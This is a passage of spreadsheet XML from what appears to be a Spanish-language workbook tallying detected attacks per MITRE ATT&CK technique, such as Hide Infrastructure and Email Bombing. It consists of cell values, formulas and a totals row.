  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B76)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>89</v>
      </c>
      <c r="F76" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (89)</v>
      </c>
      <c r="G76" s="292">
        <v>2</v>
      </c>
      <c r="H76" s="322">
        <v>2</v>
      </c>
      <c r="I76" s="322" t="str">
        <f t="shared" si="15"/>
        <v>2 (2)</v>
      </c>
      <c r="J76" s="12">
        <v>2</v>
      </c>
      <c r="K76" s="13">
        <v>1</v>
      </c>
      <c r="L76" s="394">
        <v>2</v>
      </c>
      <c r="M76" s="322">
        <v>2</v>
      </c>
      <c r="N76" s="322">
        <v>2</v>
      </c>
      <c r="O76" s="322" t="str">
        <f t="shared" si="16"/>
        <v>2 (2)</v>
      </c>
      <c r="P76" s="12">
        <v>2</v>
      </c>
      <c r="Q76" s="13">
        <v>1</v>
      </c>
      <c r="R76" s="394">
        <v>2</v>
      </c>
      <c r="S76" s="292">
        <v>4</v>
      </c>
      <c r="T76" s="322">
        <v>4</v>
      </c>
      <c r="U76" s="322" t="str">
        <f t="shared" si="17"/>
        <v>4 (4)</v>
      </c>
      <c r="V76" s="12">
        <v>4</v>
      </c>
      <c r="W76" s="13">
        <v>1</v>
      </c>
      <c r="X76" s="394">
        <v>3</v>
      </c>
      <c r="Y76" s="392">
        <v>12</v>
      </c>
      <c r="Z76" s="392">
        <v>11</v>
      </c>
      <c r="AA76" s="322" t="str">
        <f t="shared" si="18"/>
        <v>11 (12)</v>
      </c>
      <c r="AB76" s="392">
        <v>8</v>
      </c>
      <c r="AC76" s="16">
        <v>1</v>
      </c>
      <c r="AD76" s="394">
        <v>7</v>
      </c>
      <c r="AE76" s="392">
        <v>48</v>
      </c>
      <c r="AF76" s="392">
        <v>11</v>
      </c>
      <c r="AG76" s="322" t="str">
        <f t="shared" si="19"/>
        <v>11 (48)</v>
      </c>
      <c r="AH76" s="392">
        <v>8</v>
      </c>
      <c r="AI76" s="16">
        <v>1</v>
      </c>
      <c r="AJ76" s="394">
        <v>6</v>
      </c>
      <c r="AK76" s="392">
        <v>60</v>
      </c>
      <c r="AL76" s="392">
        <v>22</v>
      </c>
      <c r="AM76" s="322" t="str">
        <f t="shared" si="20"/>
        <v>22 (60)</v>
      </c>
      <c r="AN76" s="392">
        <v>16</v>
      </c>
      <c r="AO76" s="16">
        <v>1</v>
      </c>
      <c r="AP76" s="394">
        <v>11</v>
      </c>
      <c r="AQ76" s="292">
        <v>0</v>
      </c>
      <c r="AR76" s="322">
        <v>0</v>
      </c>
      <c r="AS76" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT76" s="12">
        <v>0</v>
      </c>
      <c r="AU76" s="13">
        <v>0</v>
      </c>
      <c r="AV76" s="394">
        <v>0</v>
      </c>
      <c r="AW76" s="392">
        <v>1</v>
      </c>
      <c r="AX76" s="392">
        <v>1</v>
      </c>
      <c r="AY76" s="322" t="str">
        <f t="shared" si="22"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ76" s="4">
        <v>1</v>
      </c>
      <c r="BA76" s="16">
        <v>1</v>
      </c>
      <c r="BB76" s="394">
        <v>1</v>
      </c>
      <c r="BC76" s="292">
        <v>5</v>
      </c>
      <c r="BD76" s="322">
        <v>5</v>
      </c>
      <c r="BE76" s="322" t="str">
        <f t="shared" si="23"/>
        <v>5 (5)</v>
      </c>
      <c r="BF76" s="12">
        <v>5</v>
      </c>
      <c r="BG76" s="13">
        <v>1</v>
      </c>
      <c r="BH76" s="394">
        <v>3</v>
      </c>
      <c r="BI76" s="292">
        <v>2</v>
      </c>
      <c r="BJ76" s="322">
        <v>1</v>
      </c>
      <c r="BK76" s="322" t="str">
        <f t="shared" si="24"/>
        <v>1 (2)</v>
      </c>
      <c r="BL76" s="12">
        <v>1</v>
      </c>
      <c r="BM76" s="13">
        <v>1</v>
      </c>
      <c r="BN76" s="394">
        <v>1</v>
      </c>
      <c r="BO76" s="292">
        <v>93</v>
      </c>
      <c r="BP76" s="322">
        <v>86</v>
      </c>
      <c r="BQ76" s="322" t="str">
        <f t="shared" si="25"/>
        <v>86 (93)</v>
      </c>
      <c r="BR76" s="12">
        <v>1</v>
      </c>
      <c r="BS76" s="12">
        <v>11</v>
      </c>
      <c r="BT76" s="13">
        <v>1</v>
      </c>
      <c r="BU76" s="394">
        <v>86</v>
      </c>
      <c r="BV76" s="292">
        <v>0</v>
      </c>
      <c r="BW76" s="322">
        <v>0</v>
      </c>
      <c r="BX76" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY76" s="12">
        <v>0</v>
      </c>
      <c r="BZ76" s="13">
        <v>0</v>
      </c>
      <c r="CA76" s="394">
        <v>0</v>
      </c>
      <c r="CB76" s="292">
        <v>3</v>
      </c>
      <c r="CC76" s="322">
        <v>3</v>
      </c>
      <c r="CD76" s="322" t="str">
        <f t="shared" si="27"/>
        <v>3 (3)</v>
      </c>
      <c r="CE76" s="12">
        <v>0</v>
      </c>
      <c r="CF76" s="12">
        <v>1</v>
      </c>
      <c r="CG76" s="13">
        <v>1</v>
      </c>
      <c r="CH76" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="77" spans="1:98" ht="15" customHeight="1">
      <c r="A77" s="4">
        <f t="shared" si="28"/>
        <v>75</v>
      </c>
      <c r="B77" s="4" t="str">
        <f>IFERROR(VLOOKUP(A77,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1665</v>
      </c>
      <c r="C77" s="4" t="str">
        <f>IFERROR(VLOOKUP(B77,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hide Infrastructure</v>
      </c>
      <c r="D77" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B77)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F77" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (12)</v>
      </c>
      <c r="G77" s="292">
        <v>18</v>
      </c>
      <c r="H77" s="322">
        <v>4</v>
      </c>
      <c r="I77" s="322" t="str">
        <f t="shared" si="15"/>
        <v>4 (18)</v>
      </c>
      <c r="J77" s="12">
        <v>2</v>
      </c>
      <c r="K77" s="13">
        <v>1</v>
      </c>
      <c r="L77" s="394">
        <v>4</v>
      </c>
      <c r="M77" s="322">
        <v>0</v>
      </c>
      <c r="N77" s="322">
        <v>0</v>
      </c>
      <c r="O77" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P77" s="12">
        <v>0</v>
      </c>
      <c r="Q77" s="13">
        <v>0</v>
      </c>
      <c r="R77" s="394">
        <v>0</v>
      </c>
      <c r="S77" s="292">
        <v>18</v>
      </c>
      <c r="T77" s="322">
        <v>4</v>
      </c>
      <c r="U77" s="322" t="str">
        <f t="shared" si="17"/>
        <v>4 (18)</v>
      </c>
      <c r="V77" s="12">
        <v>2</v>
      </c>
      <c r="W77" s="13">
        <v>1</v>
      </c>
      <c r="X77" s="394">
        <v>4</v>
      </c>
      <c r="Y77" s="392">
        <v>282</v>
      </c>
      <c r="Z77" s="392">
        <v>10</v>
      </c>
      <c r="AA77" s="322" t="str">
        <f t="shared" si="18"/>
        <v>10 (282)</v>
      </c>
      <c r="AB77" s="392">
        <v>3</v>
      </c>
      <c r="AC77" s="16">
        <v>1</v>
      </c>
      <c r="AD77" s="394">
        <v>8</v>
      </c>
      <c r="AE77" s="392">
        <v>6</v>
      </c>
      <c r="AF77" s="392">
        <v>6</v>
      </c>
      <c r="AG77" s="322" t="str">
        <f t="shared" si="19"/>
        <v>6 (6)</v>
      </c>
      <c r="AH77" s="392">
        <v>2</v>
      </c>
      <c r="AI77" s="16">
        <v>1</v>
      </c>
      <c r="AJ77" s="394">
        <v>3</v>
      </c>
      <c r="AK77" s="392">
        <v>288</v>
      </c>
      <c r="AL77" s="392">
        <v>16</v>
      </c>
      <c r="AM77" s="322" t="str">
        <f t="shared" si="20"/>
        <v>16 (288)</v>
      </c>
      <c r="AN77" s="392">
        <v>5</v>
      </c>
      <c r="AO77" s="16">
        <v>1</v>
      </c>
      <c r="AP77" s="394">
        <v>9</v>
      </c>
      <c r="AQ77" s="292">
        <v>0</v>
      </c>
      <c r="AR77" s="322">
        <v>0</v>
      </c>
      <c r="AS77" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT77" s="12">
        <v>0</v>
      </c>
      <c r="AU77" s="13">
        <v>0</v>
      </c>
      <c r="AV77" s="394">
        <v>0</v>
      </c>
      <c r="AW77" s="392">
        <v>0</v>
      </c>
      <c r="AX77" s="392">
        <v>0</v>
      </c>
      <c r="AY77" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ77" s="4">
        <v>0</v>
      </c>
      <c r="BA77" s="16">
        <v>0</v>
      </c>
      <c r="BB77" s="394">
        <v>0</v>
      </c>
      <c r="BC77" s="292">
        <v>18</v>
      </c>
      <c r="BD77" s="322">
        <v>4</v>
      </c>
      <c r="BE77" s="322" t="str">
        <f t="shared" si="23"/>
        <v>4 (18)</v>
      </c>
      <c r="BF77" s="12">
        <v>2</v>
      </c>
      <c r="BG77" s="13">
        <v>1</v>
      </c>
      <c r="BH77" s="394">
        <v>4</v>
      </c>
      <c r="BI77" s="292">
        <v>6</v>
      </c>
      <c r="BJ77" s="322">
        <v>2</v>
      </c>
      <c r="BK77" s="322" t="str">
        <f t="shared" si="24"/>
        <v>2 (6)</v>
      </c>
      <c r="BL77" s="12">
        <v>1</v>
      </c>
      <c r="BM77" s="13">
        <v>1</v>
      </c>
      <c r="BN77" s="394">
        <v>2</v>
      </c>
      <c r="BO77" s="292">
        <v>19</v>
      </c>
      <c r="BP77" s="322">
        <v>15</v>
      </c>
      <c r="BQ77" s="322" t="str">
        <f t="shared" si="25"/>
        <v>15 (19)</v>
      </c>
      <c r="BR77" s="12">
        <v>1</v>
      </c>
      <c r="BS77" s="12">
        <v>6</v>
      </c>
      <c r="BT77" s="13">
        <v>1</v>
      </c>
      <c r="BU77" s="394">
        <v>10</v>
      </c>
      <c r="BV77" s="292">
        <v>0</v>
      </c>
      <c r="BW77" s="322">
        <v>0</v>
      </c>
      <c r="BX77" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY77" s="12">
        <v>0</v>
      </c>
      <c r="BZ77" s="13">
        <v>0</v>
      </c>
      <c r="CA77" s="394">
        <v>0</v>
      </c>
      <c r="CB77" s="292">
        <v>18</v>
      </c>
      <c r="CC77" s="322">
        <v>6</v>
      </c>
      <c r="CD77" s="322" t="str">
        <f t="shared" si="27"/>
        <v>6 (18)</v>
      </c>
      <c r="CE77" s="12">
        <v>0</v>
      </c>
      <c r="CF77" s="12">
        <v>1</v>
      </c>
      <c r="CG77" s="13">
        <v>1</v>
      </c>
      <c r="CH77" s="394">
        <v>6</v>
      </c>
    </row>
    <row r="78" spans="1:98" ht="15" customHeight="1">
      <c r="A78" s="4">
        <f t="shared" si="28"/>
        <v>76</v>
      </c>
      <c r="B78" s="4" t="str">
        <f>IFERROR(VLOOKUP(A78,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1667</v>
      </c>
      <c r="C78" s="493" t="str">
        <f>IFERROR(VLOOKUP(B78,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Bombing</v>
      </c>
      <c r="D78" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B78)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>100</v>
      </c>
      <c r="F78" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (100)</v>
      </c>
      <c r="G78" s="292">
        <v>2</v>
      </c>
      <c r="H78" s="322">
        <v>2</v>
      </c>
      <c r="I78" s="322" t="str">
        <f t="shared" si="15"/>
        <v>2 (2)</v>
      </c>
      <c r="J78" s="12">
        <v>1</v>
      </c>
      <c r="K78" s="13">
        <v>1</v>
      </c>
      <c r="L78" s="394">
        <v>2</v>
      </c>
      <c r="M78" s="322">
        <v>0</v>
      </c>
      <c r="N78" s="322">
        <v>0</v>
      </c>
      <c r="O78" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P78" s="12">
        <v>0</v>
      </c>
      <c r="Q78" s="13">
        <v>0</v>
      </c>
      <c r="R78" s="394">
        <v>0</v>
      </c>
      <c r="S78" s="292">
        <v>2</v>
      </c>
      <c r="T78" s="322">
        <v>2</v>
      </c>
      <c r="U78" s="322" t="str">
        <f t="shared" si="17"/>
        <v>2 (2)</v>
      </c>
      <c r="V78" s="12">
        <v>1</v>
      </c>
      <c r="W78" s="13">
        <v>1</v>
      </c>
      <c r="X78" s="394">
        <v>2</v>
      </c>
      <c r="Y78" s="392">
        <v>2</v>
      </c>
      <c r="Z78" s="392">
        <v>2</v>
      </c>
      <c r="AA78" s="322" t="str">
        <f t="shared" si="18"/>
        <v>2 (2)</v>
      </c>
      <c r="AB78" s="392">
        <v>1</v>
      </c>
      <c r="AC78" s="16">
        <v>1</v>
      </c>
      <c r="AD78" s="394">
        <v>2</v>
      </c>
      <c r="AE78" s="392">
        <v>4</v>
      </c>
      <c r="AF78" s="392">
        <v>2</v>
      </c>
      <c r="AG78" s="322" t="str">
        <f t="shared" si="19"/>
        <v>2 (4)</v>
      </c>
      <c r="AH78" s="392">
        <v>2</v>
      </c>
      <c r="AI78" s="16">
        <v>1</v>
      </c>
      <c r="AJ78" s="394">
        <v>1</v>
      </c>
      <c r="AK78" s="392">
        <v>6</v>
      </c>
      <c r="AL78" s="392">
        <v>4</v>
      </c>
      <c r="AM78" s="322" t="str">
        <f t="shared" si="20"/>
        <v>4 (6)</v>
      </c>
      <c r="AN78" s="392">
        <v>3</v>
      </c>
      <c r="AO78" s="16">
        <v>1</v>
      </c>
      <c r="AP78" s="394">
        <v>3</v>
      </c>
      <c r="AQ78" s="292">
        <v>0</v>
      </c>
      <c r="AR78" s="322">
        <v>0</v>
      </c>
      <c r="AS78" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT78" s="12">
        <v>0</v>
      </c>
      <c r="AU78" s="13">
        <v>0</v>
      </c>
      <c r="AV78" s="394">
        <v>0</v>
      </c>
      <c r="AW78" s="392">
        <v>0</v>
      </c>
      <c r="AX78" s="392">
        <v>0</v>
      </c>
      <c r="AY78" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ78" s="4">
        <v>0</v>
      </c>
      <c r="BA78" s="16">
        <v>0</v>
      </c>
      <c r="BB78" s="394">
        <v>0</v>
      </c>
      <c r="BC78" s="292">
        <v>2</v>
      </c>
      <c r="BD78" s="322">
        <v>2</v>
      </c>
      <c r="BE78" s="322" t="str">
        <f t="shared" si="23"/>
        <v>2 (2)</v>
      </c>
      <c r="BF78" s="12">
        <v>1</v>
      </c>
      <c r="BG78" s="13">
        <v>1</v>
      </c>
      <c r="BH78" s="394">
        <v>2</v>
      </c>
      <c r="BI78" s="292">
        <v>0</v>
      </c>
      <c r="BJ78" s="322">
        <v>0</v>
      </c>
      <c r="BK78" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL78" s="12">
        <v>0</v>
      </c>
      <c r="BM78" s="13">
        <v>0</v>
      </c>
      <c r="BN78" s="394">
        <v>0</v>
      </c>
      <c r="BO78" s="292">
        <v>100</v>
      </c>
      <c r="BP78" s="322">
        <v>100</v>
      </c>
      <c r="BQ78" s="322" t="str">
        <f t="shared" si="25"/>
        <v>100 (100)</v>
      </c>
      <c r="BR78" s="12">
        <v>0</v>
      </c>
      <c r="BS78" s="12">
        <v>1</v>
      </c>
      <c r="BT78" s="13">
        <v>1</v>
      </c>
      <c r="BU78" s="394">
        <v>100</v>
      </c>
      <c r="BV78" s="292">
        <v>0</v>
      </c>
      <c r="BW78" s="322">
        <v>0</v>
      </c>
      <c r="BX78" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY78" s="12">
        <v>0</v>
      </c>
      <c r="BZ78" s="13">
        <v>0</v>
      </c>
      <c r="CA78" s="394">
        <v>0</v>
      </c>
      <c r="CB78" s="292">
        <v>0</v>
      </c>
      <c r="CC78" s="322">
        <v>0</v>
      </c>
      <c r="CD78" s="322" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE78" s="12">
        <v>0</v>
      </c>
      <c r="CF78" s="12">
        <v>0</v>
      </c>
      <c r="CG78" s="13">
        <v>0</v>
      </c>
      <c r="CH78" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:98" s="4" customFormat="1" ht="15" customHeight="1">
      <c r="A79" s="660" t="s">
        <v>176</v>
      </c>
      <c r="B79" s="661"/>
      <c r="C79" s="662"/>
      <c r="D79" s="11">
        <f>SUM(D3:D78)</f>
        <v>110</v>
      </c>
      <c r="E79" s="11">
        <f>SUM(E3:E78)</f>
        <v>3573695</v>
      </c>
      <c r="F79" s="580" t="str">
        <f>D79&amp;" ("&amp;E79&amp;")"</f>
        <v>110 (3573695)</v>
      </c>
      <c r="G79" s="289">
        <f>SUM(G3:G78)</f>
        <v>35137</v>
      </c>
      <c r="H79" s="581">
        <f>SUM(H3:H78)</f>
        <v>12783</v>
      </c>
      <c r="I79" s="581" t="str">
        <f t="shared" ref="I79" si="30">H79 &amp; " (" &amp; G79 &amp; ")"</f>
        <v>12783 (35137)</v>
      </c>
      <c r="J79" s="11">
        <f>SUM(J3:J78)</f>
        <v>93</v>
      </c>
      <c r="K79" s="14">
        <f>SUMPRODUCT($D3:$D$78,K3:K78)/$D$79</f>
        <v>0.6454545454545455</v>
      </c>
      <c r="L79" s="395">
        <f>SUM(L$3:L$78)</f>
        <v>12738</v>
      </c>
      <c r="M79" s="581">
        <f>SUM(M3:M78)</f>
        <v>12929</v>
      </c>
      <c r="N79" s="581">
        <f>SUM(N3:N78)</f>
        <v>4878</v>
      </c>
      <c r="O79" s="581" t="str">
        <f t="shared" ref="O79" si="31">N79 &amp; " (" &amp; M79 &amp; ")"</f>
        <v>4878 (12929)</v>
      </c>
      <c r="P79" s="11">
        <f>SUM(P3:P78)</f>
        <v>271</v>
      </c>
      <c r="Q79" s="14">
        <f>SUMPRODUCT($D3:$D$78,Q3:Q78)/$D$79</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="R79" s="290">
        <f>SUM(R$3:R$78)</f>
        <v>3178</v>
      </c>
      <c r="S79" s="289">
        <f>SUM(S3:S78)</f>
        <v>48066</v>
      </c>
      <c r="T79" s="581">
        <f>SUM(T3:T78)</f>
        <v>17661</v>
      </c>
      <c r="U79" s="581" t="str">
        <f t="shared" ref="U79" si="32">T79 &amp; " (" &amp; S79 &amp; ")"</f>
        <v>17661 (48066)</v>
      </c>
      <c r="V79" s="11">
        <f>SUM(V3:V78)</f>
        <v>364</v>
      </c>
      <c r="W79" s="14">
        <f>SUMPRODUCT($D3:$D$78,W3:W78)/$D$79</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="X79" s="395">
        <f>SUM(X$3:X$78)</f>
        <v>14744</v>
      </c>
      <c r="Y79" s="581">
        <f>SUM(Y3:Y78)</f>
        <v>1471187</v>
      </c>
      <c r="Z79" s="581">
        <f>SUM(Z3:Z78)</f>
        <v>378848</v>
      </c>
      <c r="AA79" s="581" t="str">
        <f t="shared" ref="AA79" si="33">Z79 &amp; " (" &amp; Y79 &amp; ")"</f>
        <v>378848 (1471187)</v>
      </c>
      <c r="AB79" s="11">
        <f>SUM(AB3:AB78)</f>
        <v>808</v>
      </c>
      <c r="AC79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AC3:AC78)/$D$79</f>
        <v>0.87272727272727268</v>
      </c>
      <c r="AD79" s="290">
        <f>SUM(AD$3:AD$78)</f>
        <v>206351</v>
      </c>
      <c r="AE79" s="289">
        <f>SUM(AE3:AE78)</f>
        <v>237540</v>
      </c>
      <c r="AF79" s="581">
        <f>SUM(AF3:AF78)</f>
        <v>73630</v>
      </c>
      <c r="AG79" s="581" t="str">
        <f t="shared" ref="AG79" si="34">AF79 &amp; " (" &amp; AE79 &amp; ")"</f>
        <v>73630 (237540)</v>
      </c>
      <c r="AH79" s="11">
        <f>SUM(AH3:AH78)</f>
        <v>742</v>
      </c>
      <c r="AI79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AI3:AI78)/$D$79</f>
        <v>0.99090909090909096</v>
      </c>
      <c r="AJ79" s="395">
        <f>SUM(AJ$3:AJ$78)</f>
        <v>67235</v>
      </c>
      <c r="AK79" s="581">
        <f>SUM(AK3:AK78)</f>
        <v>1698992</v>
      </c>
      <c r="AL79" s="581">
        <f>SUM(AL3:AL78)</f>
        <v>449353</v>
      </c>
      <c r="AM79" s="581" t="str">
        <f t="shared" ref="AM79" si="35">AL79 &amp; " (" &amp; AK79 &amp; ")"</f>
        <v>449353 (1698992)</v>
      </c>
      <c r="AN79" s="11">
        <f>SUM(AN3:AN78)</f>
        <v>1547</v>
      </c>
      <c r="AO79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AO3:AO78)/$D$79</f>
        <v>0.99090909090909096</v>
      </c>
      <c r="AP79" s="290">
        <f>SUM(AP$3:AP$78)</f>
        <v>207651</v>
      </c>
      <c r="AQ79" s="289">
        <f>SUM(AQ3:AQ78)</f>
        <v>16</v>
      </c>
      <c r="AR79" s="581">
        <f>SUM(AR3:AR78)</f>
        <v>2</v>
      </c>
      <c r="AS79" s="581" t="str">
        <f t="shared" ref="AS79" si="36">AR79 &amp; " (" &amp; AQ79 &amp; ")"</f>
        <v>2 (16)</v>
      </c>
      <c r="AT79" s="11">
        <f>SUM(AT3:AT78)</f>
        <v>2</v>
      </c>
      <c r="AU79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AU3:AU78)/$D$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="AV79" s="395">
        <f>SUM(AV$3:AV$78)</f>
        <v>1</v>
      </c>
      <c r="AW79" s="581">
        <f>SUM(AW3:AW78)</f>
        <v>13667</v>
      </c>
      <c r="AX79" s="581">
        <f>SUM(AX3:AX78)</f>
        <v>8104</v>
      </c>
      <c r="AY79" s="581" t="str">
        <f t="shared" ref="AY79" si="37">AX79 &amp; " (" &amp; AW79 &amp; ")"</f>
        <v>8104 (13667)</v>
      </c>
      <c r="AZ79" s="11">
        <f>SUM(AZ3:AZ78)</f>
        <v>479</v>
      </c>
      <c r="BA79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BA3:BA78)/$D$79</f>
        <v>0.35454545454545455</v>
      </c>
      <c r="BB79" s="290">
        <f>SUM(BB$3:BB$78)</f>
        <v>4077</v>
      </c>
      <c r="BC79" s="289">
        <f>SUM(BC3:BC78)</f>
        <v>61717</v>
      </c>
      <c r="BD79" s="581">
        <f>SUM(BD3:BD78)</f>
        <v>25763</v>
      </c>
      <c r="BE79" s="581" t="str">
        <f t="shared" ref="BE79" si="38">BD79 &amp; " (" &amp; BC79 &amp; ")"</f>
        <v>25763 (61717)</v>
      </c>
      <c r="BF79" s="11">
        <f>SUM(BF3:BF78)</f>
        <v>841</v>
      </c>
      <c r="BG79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BG3:BG78)/$D$79</f>
        <v>0.76363636363636367</v>
      </c>
      <c r="BH79" s="395">
        <f>SUM(BH$3:BH$78)</f>
        <v>15780</v>
      </c>
      <c r="BI79" s="289">
        <f>SUM(BI3:BI78)</f>
        <v>319274</v>
      </c>
      <c r="BJ79" s="581">
        <f>SUM(BJ3:BJ78)</f>
        <v>318431</v>
      </c>
      <c r="BK79" s="581" t="str">
        <f t="shared" ref="BK79" si="39">BJ79 &amp; " (" &amp; BI79 &amp; ")"</f>
        <v>318431 (319274)</v>
      </c>
      <c r="BL79" s="11">
        <f>SUM(BL3:BL78)</f>
        <v>140</v>
      </c>
      <c r="BM79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BM3:BM78)/$D$79</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="BN79" s="290">
        <f>SUM(BN$3:BN$78)</f>
        <v>318239</v>
      </c>
      <c r="BO79" s="289">
        <f>SUM(BO3:BO78)</f>
        <v>1651667</v>
      </c>
      <c r="BP79" s="581">
        <f>SUM(BP3:BP78)</f>
        <v>1639887</v>
      </c>
      <c r="BQ79" s="581" t="str">
        <f t="shared" ref="BQ79" si="40">BP79 &amp; " (" &amp; BO79 &amp; ")"</f>
        <v>1639887 (1651667)</v>
      </c>
      <c r="BR79" s="11">
        <f>SUM(BR3:BR78)</f>
        <v>140</v>
      </c>
      <c r="BS79" s="11">
        <f>SUM(BS3:BS78)</f>
        <v>283</v>
      </c>
      <c r="BT79" s="472">
        <f>SUMPRODUCT($D3:$D$78,BT3:BT78)/$D$79</f>
        <v>0.92121212121212115</v>
      </c>
      <c r="BU79" s="580">
        <f>SUM(BU3:BU78)</f>
        <v>979084</v>
      </c>
      <c r="BV79" s="289">
        <f>SUM(BV3:BV78)</f>
        <v>19938</v>
      </c>
      <c r="BW79" s="581">
        <f>SUM(BW3:BW78)</f>
        <v>19899</v>
      </c>
      <c r="BX79" s="581" t="str">
        <f t="shared" ref="BX79" si="41">BW79 &amp; " (" &amp; BV79 &amp; ")"</f>
        <v>19899 (19938)</v>
      </c>
      <c r="BY79" s="11">
        <f>SUM(BY3:BY78)</f>
        <v>73</v>
      </c>
      <c r="BZ79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BZ3:BZ78)/$D$79</f>
        <v>0.24545454545454545</v>
      </c>
      <c r="CA79" s="395">
        <f>SUM(CA$3:CA$78)</f>
        <v>19840</v>
      </c>
      <c r="CB79" s="581">
        <f>SUM(CB3:CB78)</f>
        <v>3992985</v>
      </c>
      <c r="CC79" s="581">
        <f>SUM(CC3:CC78)</f>
        <v>2488090</v>
      </c>
      <c r="CD79" s="581" t="str">
        <f t="shared" ref="CD79" si="42">CC79 &amp; " (" &amp; CB79 &amp; ")"</f>
        <v>2488090 (3992985)</v>
      </c>
      <c r="CE79" s="11">
        <f>SUM(CE3:CE78)</f>
        <v>0</v>
      </c>
      <c r="CF79" s="11">
        <f>SUM(CF3:CF78)</f>
        <v>64</v>
      </c>
      <c r="CG79" s="14">
        <f>SUMPRODUCT($D3:$D$78,CG3:CG78)/$D$79</f>
        <v>0.59090909090909094</v>
      </c>
      <c r="CH79" s="514">
        <f>SUM(CH3:CH78)</f>
        <v>2488089</v>
      </c>
      <c r="CI79" s="3"/>
      <c r="CJ79" s="3"/>
      <c r="CK79" s="3"/>
      <c r="CL79" s="3"/>
      <c r="CM79" s="3"/>
      <c r="CN79" s="3"/>
      <c r="CO79" s="3"/>
      <c r="CP79" s="3"/>
      <c r="CQ79" s="3"/>
      <c r="CR79" s="3"/>
      <c r="CS79" s="3"/>
      <c r="CT79" s="3"/>
    </row>
    <row r="80" spans="1:98" s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A80" s="15"/>
      <c r="B80" s="3"/>
      <c r="C80" s="3"/>
      <c r="D80" s="1"/>
      <c r="E80" s="1"/>
      <c r="F80" s="3"/>
      <c r="G80" s="3"/>
      <c r="H80" s="3"/>
      <c r="I80" s="3"/>
      <c r="J80" s="3"/>
      <c r="K80" s="738"/>
      <c r="L80" s="738"/>
      <c r="M80" s="738"/>
      <c r="N80" s="738"/>
      <c r="O80" s="738"/>
      <c r="P80" s="738"/>
      <c r="Q80" s="738"/>
      <c r="R80" s="1"/>
      <c r="S80" s="1"/>
      <c r="T80" s="1"/>
      <c r="U80" s="1"/>
      <c r="V80" s="1"/>
      <c r="W80" s="1"/>
      <c r="X80" s="1"/>
      <c r="Y80" s="1"/>
      <c r="Z80" s="1"/>
      <c r="AA80" s="1"/>
      <c r="AB80" s="1"/>
      <c r="AC80" s="1"/>
      <c r="AD80" s="1"/>
      <c r="AE80" s="3"/>
      <c r="AF80" s="3"/>
      <c r="AG80" s="3"/>
      <c r="AH80" s="3"/>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405"/>
      <c r="BJ80" s="406"/>
      <c r="BK80" s="406"/>
      <c r="BL80" s="406"/>
      <c r="BM80" s="406"/>
      <c r="BN80" s="406"/>
      <c r="BO80" s="406"/>
      <c r="BP80" s="406"/>
      <c r="BQ80" s="406"/>
      <c r="BR80" s="406"/>
      <c r="BS80" s="406"/>
      <c r="BT80" s="406"/>
      <c r="BU80" s="406"/>
      <c r="BV80" s="406"/>
      <c r="BW80" s="406"/>
      <c r="BX80" s="406"/>
      <c r="BY80" s="406"/>
      <c r="BZ80" s="406"/>
      <c r="CA80" s="406"/>
